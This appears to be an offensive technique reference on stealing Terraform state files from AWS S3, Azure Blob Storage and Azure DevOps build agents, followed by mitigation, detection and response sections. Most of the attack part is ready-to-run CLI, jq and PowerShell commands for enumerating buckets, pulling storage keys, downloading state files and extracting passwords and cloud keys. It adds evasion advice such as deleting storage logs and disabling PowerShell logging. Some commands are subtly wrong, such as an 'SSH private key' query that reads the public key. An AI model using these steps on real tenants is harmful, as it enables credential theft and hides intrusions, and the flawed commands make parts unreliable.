| Attribute | Details | |—|—| | Technique ID | SUPPLY-CHAIN-009 | | MITRE ATT&CK v18.1 | T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools | | Tactic | Supply Chain Compromise | | Platforms | Entra ID / DevOps | | Severity | Critical | | Technique Status | ACTIVE | | Last Verified | 2026-01-10 | | Affected Versions | Terraform 0.11+ (all versions affected) | | Patched In | N/A - Inherent to Terraform state design; requires operational mitigations | | Author | SERVTEP – Artur Pchelnikau |
Concept: Terraform state files (.tfstate) are JSON-formatted repositories that store the complete state of managed cloud infrastructure, including sensitive metadata, resource configurations, and credentials. An attacker with access to these files gains the ability to read, modify, or delete infrastructure definitions, steal embedded secrets (database passwords, API keys, SSH keys, SSL certificates), and execute arbitrary infrastructure changes through the Terraform pipeline. The attack typically targets state files stored in insecure remote backends (S3 buckets without encryption or proper access controls), Azure Storage Containers with overly permissive firewall rules, or state files exposed in version control systems, CI/CD pipeline logs, or developer workstations.
Attack Surface: Remote state backends (AWS S3, Azure Blob Storage, Terraform Cloud), Azure DevOps Pipeline secure files libraries, Git repositories (public or private with weak access controls), developer local workstations, and CI/CD build agent caches.
Business Impact: Complete Infrastructure Compromise. An attacker with access to production Terraform state files can exfiltrate all embedded secrets, modify infrastructure to create persistent backdoors, redirect traffic, disable security controls, or delete critical resources. The European Space Agency breach (January 2026) demonstrated the severity: attackers stole 200GB of data including Terraform files, CI/CD pipelines, and hardcoded credentials from a single week of repository access, enabling supply chain attacks against 23 member states.
Technical Context: This attack typically requires 5-15 minutes of hands-on execution once access to the remote backend is obtained. The attack surface is vast because Terraform state files are accessed by: (1) developer workstations during terraform plan and terraform apply operations, (2) CI/CD agents executing deployment pipelines, (3) Terraform Cloud/Enterprise workers if using managed services, and (4) backup and disaster recovery systems. Detection is difficult because state file access is legitimate operational activity; distinguishing malicious access from routine backups or maintenance requires behavioral analysis and strict access logging.
| Framework | Control / ID | Description | |—|—|—| | CIS Benchmark | 1.20, 3.1-3.5 | Secure backend storage, encryption, access logging | | DISA STIG | SI-4, SC-7 | Security system monitoring and boundary protection | | CISA SCuBA | CM-2, CM-5, CM-6 | Configuration management baseline, access restrictions | | NIST 800-53 | AC-3, AC-6, SC-7, SI-4, SC-28 | Access control, least privilege, boundary protection, encryption at rest | | GDPR | Art. 32, Art. 5(1)(f) | Security of processing, integrity and confidentiality of data | | DORA | Art. 9, Art. 16 | Protection and prevention; ICT risk management | | NIS2 | Art. 21, Art. 25 | Cyber risk management, detection and response | | ISO 27001 | A.9.2.3, A.12.2.1, A.13.1.1 | Management of privileged access, asset management, encryption | | ISO 27005 | 8.3.1, 8.3.2 | Configuration control and change management |
Supported Versions: Terraform 0.11+, all AWS SDK versions
Objective: Identify candidate S3 buckets that may contain Terraform state files by scanning for common naming patterns (e.g., terraform-state-*, *-tfstate*, prod-terraform-*).
Command (AWS CLI):
# List all S3 buckets accessible to current credentials
aws s3api list-buckets --output table
# Scan buckets for Terraform state naming patterns
aws s3api list-buckets --output json | \
jq '.Buckets[].Name' | \
grep -i -E '(terraform|tfstate|state)'
Expected Output:
Name: terraform-state-prod
Name: company-tfstate-backend
Name: dev-terraform-configs
Name: legacy-infrastructure-state
What This Means:
terraform, tfstate, or state are high-confidence targets.ListBucket permission; if this command fails with Access Denied, the attached policy is more restrictive, but lateral movement or privilege escalation may still be possible.OpSec & Evasion:
ListBuckets API calls with the principal ARN, timestamp, and source IP. To evade detection: (1) perform enumeration during normal business hours when DevOps activity is high, (2) use assumed roles associated with legitimate service accounts, (3) minimize the time between enumeration and exploitation, (4) consider using AWS CLI with credentials from a compromised CI/CD pipeline token rather than direct AWS access keys.Troubleshooting:
An error occurred (AccessDenied) when calling the ListBuckets operation
aws configure --profile <profile_name>. Alternatively, if you have valid Entra ID credentials with cross-cloud federation enabled, attempt to assume an AWS role via Azure AD OIDC token.Objective: Verify whether the identified S3 bucket is publicly accessible or has encryption enabled, which determines exploitation difficulty.
Command (AWS CLI):
# Check if bucket is publicly accessible
aws s3api get-bucket-acl --bucket <BUCKET_NAME>
# Check block public access settings
aws s3api get-public-access-block --bucket <BUCKET_NAME> 2>/dev/null || echo "Block public access: Not configured"
# Check encryption status
aws s3api get-bucket-encryption --bucket <BUCKET_NAME> 2>/dev/null || echo "Encryption: Not configured"
# Check bucket versioning
aws s3api get-bucket-versioning --bucket <BUCKET_NAME>
Expected Output (Insecure Configuration):
{
"Grants": [
{
"Grantee": {
"Type": "CanonicalUser",
"ID": "7c6d5..."
},
"Permission": "FULL_CONTROL"
}
]
}
What This Means:
get-bucket-acl returns entries with Type: CanonicalUser or Type: Group (especially AuthenticatedUsers or AllUsers), the bucket permissions are misconfigured.get-block-public-access returns false for all settings (or errors), public access restrictions are not enabled.OpSec & Evasion:
Troubleshooting:
NoSuchBucketPolicy or NoSuchBucket
GetBucketPolicy and GetBucketAcl permissions. If you lack these, attempt to list bucket contents directly with aws s3 ls s3://<BUCKET_NAME>/ to determine if you have read access to objects.Objective: Enumerate state files within the bucket and download them to the attacker-controlled system for offline analysis and credential extraction.
Command (AWS CLI):
# List all objects in the bucket
aws s3api list-objects-v2 --bucket <BUCKET_NAME> --output table
# Filter for .tfstate files
aws s3api list-objects-v2 --bucket <BUCKET_NAME> --output json | \
jq '.Contents[] | select(.Key | endswith(".tfstate")) | {Key: .Key, Size: .Size, LastModified: .LastModified}'
# Download all .tfstate files to local directory
aws s3 cp s3://<BUCKET_NAME>/ ./terraform-states/ --recursive --exclude "*" --include "*.tfstate"
# Download specific state file
aws s3api get-object --bucket <BUCKET_NAME> --key terraform.tfstate ./terraform.tfstate
Expected Output:
Key: production/terraform.tfstate
Size: 2048576 bytes
LastModified: 2026-01-09T14:32:15Z
Key: staging/terraform.tfstate
Size: 1024000 bytes
LastModified: 2026-01-08T10:15:22Z
What This Means:
.tfstate file represents a Terraform workspace or environment. Multiple files indicate multiple managed infrastructure stacks.OpSec & Evasion:
GetObject and ListObject API calls are logged but represent normal backup/restoration activity. To evade detection: (1) retrieve state files during scheduled backup windows, (2) use download acceleration settings to minimize transfer time, (3) if possible, compress state files to reduce transfer size and time in transit.Troubleshooting:
InvalidStorageClass or NoSuchKey
aws s3api list-object-versions --bucket <BUCKET_NAME>. If versioning is enabled, download the previous state version: aws s3api get-object --bucket <BUCKET_NAME> --key terraform.tfstate --version-id <VERSION_ID> ./terraform.tfstate.backup.Objective: Analyze the JSON state file to identify and extract embedded secrets such as database passwords, API tokens, SSH keys, and SSL certificates.
Command (Bash/jq):
# Pretty-print state file to identify resource structure
jq '.' terraform.tfstate | less
# Extract database resource passwords
jq '.resources[] | select(.type == "aws_db_instance") | .instances[].attributes | {db_name, master_username, master_password}' terraform.tfstate
# Extract API keys and tokens
jq '.resources[] | select(.type == "aws_api_gateway_api_key") | .instances[].attributes.value' terraform.tfstate
# Extract RDS credentials in one-liner
jq '.resources[] | select(.type | startswith("aws_")) | .instances[].attributes | select(has("password")) | {type: .type, password}' terraform.tfstate
# Extract SSH keys (private key data)
jq '.resources[] | select(.type == "aws_key_pair") | .instances[].attributes.public_key' terraform.tfstate
# Extract SSL certificates
jq '.resources[] | select(.type == "tls_self_signed_cert") | .instances[].attributes | {cert_pem, private_key_pem}' terraform.tfstate
# Search for all attributes containing "secret", "password", "key", or "token"
jq '.resources[] | .instances[].attributes | with_entries(select(.key | test("secret|password|key|token|credential"; "i")))' terraform.tfstate
Expected Output:
{
"db_name": "production_database",
"master_username": "admin",
"master_password": "Super$SecureP@ssw0rd!2024"
}
{
"key": "AKIA1234567890ABCDE",
"secret": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
}
What This Means:
AKIA or ASIA) are directly usable for AWS API calls and can be used to escalate privileges, access additional resources, or create persistence mechanisms.OpSec & Evasion:
Troubleshooting:
Cannot index string with string "resources"
kms:Decrypt permission. Retrieve the key ID: jq '.terraform.version' terraform.tfstate. Then decrypt: aws kms decrypt --ciphertext-blob fileb://terraform.tfstate --key-id arn:aws:kms:REGION:ACCOUNT:key/KEY_ID --output text --query Plaintext | base64 -d > terraform.tfstate.decrypted.Supported Versions: Terraform 0.12+, Azure CLI 2.0+
Objective: Identify Azure Storage Accounts containing Terraform state files accessible to the current Entra ID credentials.
Command (Azure CLI):
# Login with compromised Service Principal credentials
az login --service-principal -u <CLIENT_ID> -p <CLIENT_SECRET> --tenant <TENANT_ID>
# List all Storage Accounts in current subscription
az storage account list --output table
# Filter for accounts with names matching Terraform conventions
az storage account list --output json | \
jq '.[] | select(.name | test("terraform|state|tfstate"; "i")) | {name, id, location}'
# Get storage account keys (if the current principal has read access)
az storage account keys list --resource-group <RESOURCE_GROUP> --account-name <STORAGE_ACCOUNT_NAME>
Expected Output:
Name: terraformstateprod
ResourceGroup: infrastructure-rg
Location: westeurope
Name: stagingstate
ResourceGroup: staging-rg
Location: eastus2
What This Means:
terraform, state, or similar.OpSec & Evasion:
list-keys operations and storage account enumerations. To minimize detection: (1) perform enumeration through a compromised application or VM in the target network (traffic appears to originate from within the VNet), (2) use a stolen JWT token from a legitimate client rather than direct Service Principal authentication.Troubleshooting:
Access denied with status code 403
az ad user list --filter "userType eq 'Guest'") to identify federated identities that may have broader permissions.Objective: List blob containers within the storage account and identify those containing Terraform state files.
Command (Azure CLI):
# Set storage account and key for auth
export STORAGE_ACCOUNT=<STORAGE_ACCOUNT_NAME>
export STORAGE_KEY=$(az storage account keys list --resource-group <RG> --account-name $STORAGE_ACCOUNT --output json | jq -r '.[0].value')
# List all blob containers
az storage container list --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --output table
# List blobs in a specific container
az storage blob list --container-name <CONTAINER_NAME> --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --output table
# Filter for .tfstate files
az storage blob list --container-name <CONTAINER_NAME> --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --output json | \
jq '.[] | select(.name | endswith(".tfstate")) | {name, properties}'
Expected Output:
Name: tfstate
Lease Status: unlocked
Name: terraform-configs
Lease Status: unlocked
Name: prod/terraform.tfstate
ContentLength: 2097152
LastModified: 2026-01-09T14:32:15Z
What This Means:
Lease Status: unlocked are actively accessible and not currently locked for modification..tfstate extension in containers named terraform, tfstate, or state.OpSec & Evasion:
$logs). To evade detection: (1) if you compromise a storage account, delete or truncate logs after exfiltration, (2) use Azure CLI from within an Azure VM to make traffic appear internal.Troubleshooting:
The public access level of the container cannot be determined
STORAGE_KEY correctly. If you don’t have the storage account key, attempt to retrieve it via the Azure portal or use az role assignment list --assignee <YOUR_PRINCIPAL_ID> to check if you have owner permissions, which allow key retrieval.Objective: Download state files to the attacker’s system for offline parsing and credential extraction.
Command (Azure CLI):
# Download a single state file
az storage blob download --container-name <CONTAINER_NAME> \
--name <BLOB_NAME> \
--account-name $STORAGE_ACCOUNT \
--account-key $STORAGE_KEY \
--file ./terraform.tfstate
# Download all .tfstate files from a container
for blob in $(az storage blob list --container-name <CONTAINER_NAME> --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --output json | jq -r '.[] | select(.name | endswith(".tfstate")) | .name'); do
az storage blob download --container-name <CONTAINER_NAME> --name "$blob" --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --file "./$blob"
done
# Verify downloaded file
file terraform.tfstate
jq '.terraform_version' terraform.tfstate
Expected Output:
Finished[#############################################] 100.0000%
File downloaded successfully
terraform_version: "1.5.0"
What This Means:
OpSec & Evasion:
Troubleshooting:
ResourceNotFound: The specified blob does not exist
list command. If the blob was deleted, check if the storage account has soft delete enabled: az storage account blob-service-properties show --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY. If soft delete is enabled, list deleted blobs: az storage blob list --container-name <CONTAINER_NAME> --account-name $STORAGE_ACCOUNT --account-key $STORAGE_KEY --include d.Objective: Extract credentials and sensitive configuration from Azure-specific Terraform resources.
Command (Bash/jq):
# Extract Azure SQL Database credentials
jq '.resources[] | select(.type == "azurerm_mssql_server") | .instances[].attributes | {administrator_login, administrator_login_password}' terraform.tfstate
# Extract Cosmos DB keys
jq '.resources[] | select(.type == "azurerm_cosmosdb_account") | .instances[].attributes | {primary_master_key, secondary_master_key, primary_readonly_master_key}' terraform.tfstate
# Extract Storage Account keys
jq '.resources[] | select(.type == "azurerm_storage_account") | .instances[].attributes | {storage_account_name, primary_access_key, secondary_access_key}' terraform.tfstate
# Extract Key Vault secrets and keys
jq '.resources[] | select(.type == "azurerm_key_vault_secret") | .instances[].attributes | {name, value}' terraform.tfstate
# Extract application secrets and client IDs
jq '.resources[] | select(.type == "azurerm_app_configuration") | .instances[].attributes | {name, primary_read_key, primary_write_key}' terraform.tfstate
# Comprehensive search for all sensitive data
jq '.resources[] | .instances[].attributes | with_entries(select(.value | type == "string" and (.value | test("^[A-Za-z0-9+/]{40,}={0,2}$"))))' terraform.tfstate
Expected Output:
{
"administrator_login": "sqladmin",
"administrator_login_password": "P@ssw0rd123!AzureSQL"
}
{
"primary_master_key": "AccountKey==aBcDeFgHiJkLmNoPqRsTuVwXyZ0123456789=="
}
What This Means:
OpSec & Evasion:
Troubleshooting:
jq: error (at <line>): Cannot index null with string
jq empty terraform.tfstate. If parsing fails, the file may be truncated or corrupted. Try downloading from a backup version if available.Supported Versions: Azure DevOps Pipelines, Terraform Enterprise
Objective: Gain access to pipeline variables or service connections that store Terraform state backend credentials (storage account keys, service principal tokens).
Precondition: The attacker must have compromised a developer account with access to the Azure DevOps project or a build agent on the network.
Command (PowerShell, executed from compromised build agent):
# If running inside an Azure DevOps build agent, environment variables may be exposed
Get-ChildItem env: | Where-Object {$_.Name -match "TERRAFORM|STATE|BACKEND|STORAGE|ACCOUNT|KEY|SECRET"}
# Alternative: Check for Terraform backend configuration in the build agent's home directory
Get-ChildItem -Path $env:USERPROFILE\.terraform.d -Recurse 2>/dev/null | Select-Object FullName
# Check build agent logs for exposed credentials
Get-Content C:\agents\agent\work\_tasks\*\task.json -ErrorAction SilentlyContinue | Select-String -Pattern '(password|key|secret|token|credentials)' -AllMatches
Expected Output:
TERRAFORM_BACKEND_KEY=terraform.tfstate
TF_VAR_storage_account_key=DefaultEndpointsProtocol=https;AccountName=...
SERVICE_CONNECTION_KEY=ClientSecret==...
What This Means:
secret() but may still be visible in logs or variable groups).OpSec & Evasion:
C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) will record the enumeration commands. To evade: (1) disable PowerShell logging before commands are executed, (2) clear the PowerShell history after extraction.Troubleshooting:
Access is denied when accessing service connection files
curl -X GET https://dev.azure.com/<ORG>/<PROJECT>/_apis/serviceendpoint/endpoints/<ENDPOINT_ID> -H "Authorization: Basic $(echo -n ':<PAT>' | base64)"Action 1: Encrypt Terraform State Files At Rest Enable encryption for all remote state backends. For AWS S3, enforce server-side encryption with customer-managed KMS keys.
Manual Steps (AWS S3 + Terraform Configuration):
aws kms create-key --description "Terraform State Encryption Key"
terraform {
backend "s3" {
bucket = "my-terraform-state"
key = "prod/terraform.tfstate"
region = "us-west-2"
encrypt = true
kms_key_id = "arn:aws:kms:us-west-2:123456789012:key/12345678-1234-1234-1234-123456789012"
dynamodb_table = "terraform-locks"
}
}
terraform init
Manual Steps (Azure Blob Storage + Terraform Configuration):
az storage account create \
--name terraformstate123 \
--resource-group infrastructure-rg \
--sku Standard_GRS \
--encryption-services blob \
--https-only
az storage account update \
--name terraformstate123 \
--resource-group infrastructure-rg \
--encryption-key-name tfstate-key \
--encryption-key-vault /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/infrastructure-rg/providers/Microsoft.KeyVault/vaults/terraform-vault
terraform {
backend "azurerm" {
resource_group_name = "infrastructure-rg"
storage_account_name = "terraformstate123"
container_name = "tfstate"
key = "prod/terraform.tfstate"
use_oidc = true
}
}
Action 2: Implement Strict Access Control on State File Backends Restrict access to state files to only authorized principals (service accounts, DevOps engineers) with principle of least privilege.
Manual Steps (AWS S3 Bucket Policy):
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenyPublicAccess",
"Effect": "Deny",
"Principal": "*",
"Action": "s3:*",
"Resource": [
"arn:aws:s3:::my-terraform-state",
"arn:aws:s3:::my-terraform-state/*"
],
"Condition": {
"Bool": {
"aws:SecureTransport": "false"
}
}
},
{
"Sid": "AllowTerraformExecution",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::123456789012:role/terraform-executor"
},
"Action": [
"s3:GetObject",
"s3:PutObject",
"s3:DeleteObject"
],
"Resource": "arn:aws:s3:::my-terraform-state/*"
}
]
}
aws s3api get-bucket-policy --bucket my-terraform-state to confirm policy is appliedManual Steps (Azure Blob Storage Access Control):
terraform-ci@company.onmicrosoft.com)az role assignment list --resource-group infrastructure-rg --assignee terraform-ci@company.onmicrosoft.com
Action 3: Enable State File Locking to Prevent Concurrent Modifications Implement state locking to ensure only one Terraform operation modifies state at a time, preventing race conditions and unauthorized modifications.
Manual Steps (AWS DynamoDB Locking):
aws dynamodb create-table \
--table-name terraform-locks \
--attribute-definitions AttributeName=LockID,AttributeType=S \
--key-schema AttributeName=LockID,KeyType=HASH \
--billing-mode PAY_PER_REQUEST
dynamodb_table setting)terraform apply:
terraform apply -auto-approve # DynamoDB will create lock entry during operation
Manual Steps (Azure Blob Storage Leasing):
terraform {
backend "azurerm" {
resource_group_name = "infrastructure-rg"
storage_account_name = "terraformstate123"
container_name = "tfstate"
key = "prod/terraform.tfstate"
use_oidc = true
# Locking is automatic in Azure; no additional config needed
}
}
az storage blob show \
--container-name tfstate \
--name prod/terraform.tfstate \
--account-name terraformstate123 \
--query properties.lease
Action 1: Enable Audit Logging and Monitoring for State File Access Configure Azure Activity Logs and AWS CloudTrail to capture all access to state file backends and set up alerts for suspicious patterns.
Manual Steps (AWS CloudTrail for S3 Access Logging):
terraform-state-auditcloudtrail-logs-terraform)terraform-state-access)aws cloudtrail describe-trails --include-shadow-trailsManual Configuration (Azure Activity Logs):
infrastructure-rgStorage accountsAction 2: Implement Secrets Scanning in CI/CD Pipelines Integrate automated secrets detection tools (e.g., GitGuardian, TruffleHog, Checkov) into CI/CD pipelines to prevent Terraform files with hardcoded secrets from being committed or deployed.
Manual Steps (Azure DevOps Pipeline with Checkov):
.azurepipelines/checkov-scan.yml
```yaml
trigger:
pool: vmImage: ‘ubuntu-latest’
steps:
task: UsePythonVersion@0 inputs: versionSpec: ‘3.10’ displayName: ‘Use Python 3.10’
script: | pip install checkov displayName: ‘Install Checkov’
script: | checkov -d . –framework terraform –check CKV_TERRAFORM_1,CKV_SECRET_6 –output cli displayName: ‘Scan Terraform for Secrets’
task: PublishBuildArtifacts@1 inputs: pathToPublish: ‘$(Build.ArtifactStagingDirectory)’ artifactName: ‘checkov-results’ ```
Action 3: Separate Terraform State by Environment and Access Control Isolate production, staging, and development Terraform state in separate backends with different access controls and credentials.
Manual Steps:
for env in dev staging prod; do
aws s3api create-bucket \
--bucket terraform-state-$env-$(date +%s) \
--region us-west-2 \
--create-bucket-configuration LocationConstraint=us-west-2
done
terraform {
required_version = ">= 1.0"
backend "s3" {
# Dynamically configure based on environment
# This requires external tooling (e.g., backend-config override)
}
}
variable "environment" {
type = string
validation {
condition = contains(["dev", "staging", "prod"], var.environment)
error_message = "Environment must be dev, staging, or prod."
}
}
terraform init \
-backend-config="bucket=terraform-state-prod-12345" \
-backend-config="key=infrastructure.tfstate" \
-backend-config="region=us-west-2"
# Development
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/terraform-dev --role-session-name terraform-dev-session
# Production
aws sts assume-role --role-arn arn:aws:iam::999999999999:role/terraform-prod --role-session-name terraform-prod-session
Conditional Access (Azure): Restrict Terraform operations to compliant devices and approved networks
Terraform State Access - Managed Devices OnlyRBAC Configuration: Ensure minimal required roles for Terraform service principals
# Example: Least privilege role for Terraform execution
az role definition create --role-definition '{
"Name": "TerraformExecutor",
"Description": "Custom role for Terraform state access",
"Type": "CustomRole",
"AssignableScopes": ["/subscriptions/<SUBSCRIPTION_ID>"],
"Permissions": [
{
"Actions": [
"Microsoft.Storage/storageAccounts/read",
"Microsoft.Storage/storageAccounts/listKeys/action",
"Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read",
"Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write",
"Microsoft.Storage/storageAccounts/blobServices/containers/blobs/delete"
],
"NotActions": [
"Microsoft.Storage/storageAccounts/delete",
"Microsoft.Storage/storageAccounts/update"
]
}
]
}'
Validation Command (Verify Mitigations):
# Verify S3 bucket encryption
aws s3api get-bucket-encryption --bucket my-terraform-state --output table
# Verify S3 bucket policy denies public access
aws s3api get-bucket-acl --bucket my-terraform-state | grep "AllUsers"
# Verify DynamoDB locking table exists
aws dynamodb describe-table --table-name terraform-locks --output table
# Verify Azure storage account encryption
az storage account show --resource-group infrastructure-rg --name terraformstate --output json | jq '.encryption'
# Verify audit logging is active
aws cloudtrail describe-trails --include-shadow-trails --output table | grep "S3BucketName\|IsMultiRegionTrail"
Expected Output (If Secure):
S3 Encryption: AES256 or aws:kms
S3 ACL: Only authenticated AWS account has access
DynamoDB LockID table: ACTIVE
Azure encryption: Microsoft.Storage/storageAccounts/encryptionServices/blob/enabled: true
CloudTrail: IsMultiRegionTrail: true, S3BucketName: cloudtrail-logs-terraform
Network IOCs:
Log IOCs (CloudTrail/Activity Logs):
GetObject calls to .tfstate files outside normal backup windowsListBucket operations from unfamiliar IP addresses or principalsGetObject requests followed by successful access (reconnaissance → exploitation pattern)GetBucketPolicy or GetBucketAcl followed by exfiltration (enumeration → exploitation)PutObject to attacker-controlled bucket (state file copy for offline analysis)Behavioral IOCs:
AWS CloudTrail Event Logs:
{
"eventName": "GetObject",
"eventSource": "s3.amazonaws.com",
"requestParameters": {
"bucketName": "terraform-state-prod",
"key": "production/terraform.tfstate"
},
"sourceIPAddress": "203.0.113.45",
"userAgent": "aws-cli/2.0.0",
"errorCode": null,
"awsRegion": "us-west-2",
"eventTime": "2026-01-09T14:32:15Z",
"recipientAccountId": "123456789012"
}
Azure Activity Log Entries:
{
"operationName": "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read",
"level": "Informational",
"resourceType": "Microsoft.Storage/storageAccounts/blobServices",
"resourceId": "/subscriptions/SUBSCRIPTION_ID/resourceGroups/infrastructure-rg/providers/Microsoft.Storage/storageAccounts/terraformstate123",
"identity": {
"principalId": "00000000-0000-0000-0000-000000000000",
"principalType": "ServicePrincipal"
},
"timeGenerated": "2026-01-09T14:32:15Z"
}
1. Immediate Containment:
aws s3api put-bucket-policy --bucket my-terraform-state --policy file://restrictive-policy.jsonaws iam update-access-key --access-key-id AKIA123456789 --status Inactive2. Forensic Investigation:
aws s3 sync s3://cloudtrail-logs-terraform/ ./cloudtrail-export/AzureActivity
| where ResourceType == "Microsoft.Storage/storageAccounts"
| where OperationName contains "StorageAccount" or OperationName contains "Blob"
| where TimeGenerated >= ago(90d)
| summarize by bin(TimeGenerated, 1h), OperationName, CallerIpAddress, Identity
aws s3api list-object-versions --bucket my-terraform-state) or Azure Blob soft-delete logs3. Remediation and Recovery:
terraform destroy -auto-approve && terraform apply -auto-approveterraform show terraform.tfstate | grep -A5 "type" to enumerate modified resources| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | SUPPLY-CHAIN-001 or IA-EXPLOIT-001 | Compromise DevOps infrastructure via repository access or Azure Application Proxy exploitation |
| 2 | Privilege Escalation | PE-VALID-010 or PE-ACCTMGMT-010 | Escalate from developer to DevOps admin role or Service Principal owner permissions |
| 3 | Current Step | [SUPPLY-CHAIN-009] | Terraform State File Theft – steal credentials and infrastructure metadata |
| 4 | Lateral Movement | LM-AUTH-005 or LM-AUTH-039 | Use stolen credentials (database passwords, storage account keys) to access other systems |
| 5 | Impact | IMPACT-RANSOM-001 or IMPACT-DATA-DESTROY-001 | Deploy ransomware to cloud VMs or destroy data using infrastructure privileges |
Target: European Space Agency (ESA) – 23 member states Timeline: Approximately 1 week of active exploitation (late December 2025 – early January 2026) Technique Status: The breach included exfiltration of Terraform files, CI/CD pipelines, API tokens, and hardcoded credentials from the ESA’s development infrastructure. The attacker gained access to Bitbucket repositories and Jira systems through a compromised developer account or credential exposure. Impact: 200GB of data stolen, including source code, configuration files, and sensitive infrastructure-as-code definitions. The ESA noted concern that this data “could facilitate supply chain attacks or lateral movement into more sensitive networks.” References:
Target: Organizations running Terraform Enterprise (TFE) on cloud VMs Timeline: Ongoing; vulnerability disclosed in 2024 Technique Status: By default, Terraform Enterprise does not restrict access to the instance metadata service, allowing Terraform runs to access IAM credentials from the instance role. An attacker who gains code execution in a Terraform run can exfiltrate cloud credentials. Impact: Lateral movement from Terraform Enterprise into the cloud environment, privilege escalation via instance role assumption, access to additional cloud resources beyond those managed by Terraform. Reference: Hacking the Cloud: Terraform Enterprise Metadata Service Attack